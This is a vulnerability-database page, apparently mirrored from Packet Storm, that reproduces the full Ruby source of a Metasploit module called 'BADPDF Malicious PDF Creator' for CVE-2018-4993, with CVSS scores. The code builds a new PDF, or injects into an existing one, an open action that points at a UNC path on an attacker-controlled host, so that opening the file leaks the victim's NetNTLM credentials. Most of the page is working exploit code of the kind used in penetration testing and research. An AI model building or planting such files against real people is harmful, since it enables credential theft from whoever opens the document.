Lucene search

Richard Davy, Yaron Fruchtmann, Assaf Baharav, Ido Solomon, metasploit.comPACKETSTORM:180737

HistoryAug 31, 2024 - 12:00 a.m.

BADPDF Malicious PDF Creator

2024-08-3100:00:00

Richard Davy, Yaron Fruchtmann, Assaf Baharav, Ido Solomon, metasploit.com

packetstormsecurity.com

metasploit

pdf creation

netntlm capture

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

AI Score

Confidence

Low

JSON

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::FILEFORMAT  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'BADPDF Malicious PDF Creator',  
'Description' => '  
This module can either creates a blank PDF file which contains a UNC link which can be used  
to capture NetNTLM credentials, or if the PDFINJECT option is used it will inject the necessary  
code into an existing PDF document if possible.  
',  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'Assaf Baharav', # Code provided as POC by CheckPoint  
'Yaron Fruchtmann', # Code provided as POC by CheckPoint  
'Ido Solomon', # Code provided as POC by CheckPoint  
'Richard Davy - secureyourit.co.uk', # Metasploit  
],  
'Platform' => ['win'],  
'References' =>  
[  
['CVE', '2018-4993'],  
['URL', 'https://research.checkpoint.com/ntlm-credentials-theft-via-pdf-files/']  
])  
)  
register_options(  
[  
OptAddress.new('LHOST', [true, 'Host listening for incoming SMB/WebDAV traffic', nil]),  
OptString.new('FILENAME', [false, 'Filename']),  
OptPath.new('PDFINJECT', [false, 'Path and filename to existing PDF to inject UNC link code into'])  
]  
)  
end  
  
def run  
if datastore['PDFINJECT'].nil? && datastore['FILENAME'].nil?  
print_error 'Please configure either FILENAME or PDFINJECT'  
elsif !datastore['PDFINJECT'].nil? && datastore['PDFINJECT'].to_s.end_with?('.pdf')  
injectpdf  
elsif !datastore['FILENAME'].nil? && datastore['FILENAME'].to_s.end_with?('.pdf')  
createpdf  
else  
print_error "FILENAME or PDFINJECT must end with '.pdf' file extension"  
end  
end  
  
def injectpdf  
# Payload which gets injected  
inject_payload = "/AA <</O <</F (\\\\\\\\#{datastore['LHOST']}\\\\test)/D [ 0 /Fit]/S /GoToE>>>>"  
  
# if given path doesn't exist display error and return  
unless File.exist?(datastore['PDFINJECT'])  
# If file not found display error message  
print_error "File doesn't exist #{datastore['PDFINJECT']}"  
return  
end  
  
# Read in contents of file  
content = File.binread(datastore['PDFINJECT'])  
  
# Check for place holder - below ..should.. cover most scenarios.  
newdata = ''  
[2, 4, 6, 8].each do |pholder|  
unless content.index("/Contents #{pholder} 0 R").nil?  
# If place holder exists create new file content  
newdata = content[0..(content.index("/Contents #{pholder} 0 R") + 14)] + inject_payload + content[(content.index("/Contents #{pholder} 0 R") + 15)..-1]  
break  
end  
end  
  
# Display error message if we couldn't poison the file  
if newdata.empty?  
print_error 'Could not find placeholder to poison file this time....'  
return  
end  
  
# Create new filename by replacing .pdf with _malicious.pdf  
newfilename = "#{datastore['PDFINJECT'].gsub(/\.pdf$/, '')}_malicious.pdf"  
# Write content to file  
File.open(newfilename, 'wb') { |file| file.write(newdata) }  
# Check file exists and display path or error message  
if File.exist?(newfilename)  
print_good("Malicious file written to: #{newfilename}")  
else  
print_error 'Something went wrong creating malicious PDF file'  
end  
end  
  
def createpdf  
# Code below taken POC provided by CheckPoint Research  
pdf = ''  
pdf << "%PDF-1.7\n"  
pdf << "1 0 obj\n"  
pdf << "<</Type/Catalog/Pages 2 0 R>>\n"  
pdf << "endobj\n"  
pdf << "2 0 obj\n"  
pdf << "<</Type/Pages/Kids[3 0 R]/Count 1>>\n"  
pdf << "endobj\n"  
pdf << "3 0 obj\n"  
pdf << "<</Type/Page/Parent 2 0 R/MediaBox[0 0 612 792]/Resources<<>>>>\n"  
pdf << "endobj\n"  
pdf << "xref\n"  
pdf << "0 4\n"  
pdf << "0000000000 65535 f\n"  
pdf << "0000000015 00000 n\n"  
pdf << "0000000060 00000 n\n"  
pdf << "0000000111 00000 n\n"  
pdf << "trailer\n"  
pdf << "<</Size 4/Root 1 0 R>>\n"  
pdf << "startxref\n"  
pdf << "190\n"  
pdf << "3 0 obj\n"  
pdf << "<< /Type /Page\n"  
pdf << " /Contents 4 0 R\n"  
pdf << " /AA <<\n"  
pdf << " /O <<\n"  
pdf << " /F (\\\\\\\\#{datastore['LHOST']}\\\\test)\n"  
pdf << " /D [ 0 /Fit]\n"  
pdf << " /S /GoToE\n"  
pdf << " >>\n"  
pdf << " >>\n"  
pdf << " /Parent 2 0 R\n"  
pdf << " /Resources <<\n"  
pdf << " /Font <<\n"  
pdf << " /F1 <<\n"  
pdf << " /Type /Font\n"  
pdf << " /Subtype /Type1\n"  
pdf << " /BaseFont /Helvetica\n"  
pdf << " >>\n"  
pdf << " >>\n"  
pdf << " >>\n"  
pdf << ">>\n"  
pdf << "endobj\n"  
pdf << "4 0 obj<< /Length 100>>\n"  
pdf << "stream\n"  
pdf << "BT\n"  
pdf << "/TI_0 1 Tf\n"  
pdf << "14 0 0 14 10.000 753.976 Tm\n"  
pdf << "0.0 0.0 0.0 rg\n"  
pdf << "(PDF Document) Tj\n"  
pdf << "ET\n"  
pdf << "endstream\n"  
pdf << "endobj\n"  
pdf << "trailer\n"  
pdf << "<<\n"  
pdf << " /Root 1 0 R\n"  
pdf << ">>\n"  
pdf << "%%EOF\n"  
# Write data to filename  
file_create(pdf)  
end  
end  
`